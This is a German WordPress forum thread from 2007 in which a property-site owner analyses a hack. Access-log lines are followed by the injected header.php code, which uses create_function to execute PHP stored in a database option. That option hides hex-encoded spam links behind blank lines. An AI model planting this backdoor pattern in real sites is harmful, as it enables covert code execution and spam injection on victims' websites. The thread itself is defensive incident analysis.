Wordpress gehackt und header manipuliert

  • Wir haben festgestellt, dass auf unserer Seite Immobilien Zug Zürich Aargau Schweiz. Loft Luxusimmobilien Villen Häuser in den letzten Wochen vermehrt Benutzer mit Suchbegriffen unter der Gürtellinie gelandet sind. Eine erste Analyse hat zunächst kein Ergebnis gebracht, nach vermehrt einschlägigen Besuchern haben wir diese intensiviert. Die Suchbegriffe sind derzeit noch auf google sichtbar, auf unserer Webseite jedoch nicht.
    Zusammenfassung der Ergebnisse:

    --------------------------------------------------------------------------------------------------------------
    1. Am 07.09.2007 wurde unsere header.php von IP Nummer 88.191.17.141 mittels POST request überschrieben

    Auszug aus dem Access Log
    88.191.17.141 [07/Sep/2007:10:51:36 +0200] POST /wp-admin/ theme-editor.php HTTP/1.1 302 - http://www.lofthome??/wp-admin/the…home+immobilien Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
    88.191.17.141 [07/Sep/2007:10:52:08 +0200] POST /wp-admin/ theme-editor.php HTTP/1.1 302 - http://www.lofthome??/wp-admin/the…immobilien&a=te Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
    --------------------------------------------------------------------------------------------------------------
    2. Ein Login für diese IP bzw. diesen Benutzer können wir aufgrund der Logfiles nicht erkennen.
    --------------------------------------------------------------------------------------------------------------
    3. Die Änderung hat in header.php eine Function wp-headers angelegt.

    php /* Don't remove this line. */ wp_head(); $wp_headers = create_function('', get_option("blog_headers"));

    Weiter untem in der Datei dann der kritische Aufruf

    div id="container"

    div id="header"
    php $wp_headers()

    --------------------------------------------------------------------------------------------------------------
    4. Die Funktion liest die Daten aus wp_option für den Key blog_headers.
    --------------------------------------------------------------------------------------------------------------
    5. Das Feld der Tabelle enthielt zuerst eine unverfänglich aussehende Zeile

    DOCTYPE html PUBLIC //W3C//DTD XHTML 1.0 Transitional//EN ...

    dann ca. 20 Leerzeilen, sodass der weitere Inhalt auf Anhieb gar nicht erkennbar war und dann Hexadezimal rund 300 versteckte Links
    mit einem encode Befehl am Ende.
    --------------------------------------------------------------------------------------------------------------
    6. Das Ergebnis war verheerend. Inzwischen alle Accounts geändert, WP User admin gelöscht, FTP account geändert.


    Trotzdem bleibt die Frage:

    WIE KANN DIE HEADER.PHP IN UNSEREM THEME GEÄNDERT WORDEN SEIN, OHNE DASS ZUVOR EIN LOGIN AUF UNSERE SEITE STATTGEFUNDEN HAT?

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • WIE KANN DIE HEADER.PHP IN UNSEREM THEME GEÄNDERT WORDEN SEIN, OHNE DASS ZUVOR EIN LOGIN AUF UNSERE SEITE STATTGEFUNDEN HAT?


    Zum Beispiel durch eine Sicherheitslücke in einer veraltenen WordPress-Version.

    "Eine gut gestellte Frage ist schon halb beantwortet."

  • WP 2.1 war ja stellenweise offen wie ein Scheunentor. Möglicherweise hat irgendwo ein Script gelegen, dass von innen heraus Mist gebaut hat.

    Syntronica Le coeur est le moteur du corps, mais le cerveau est le moteur de la vie.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!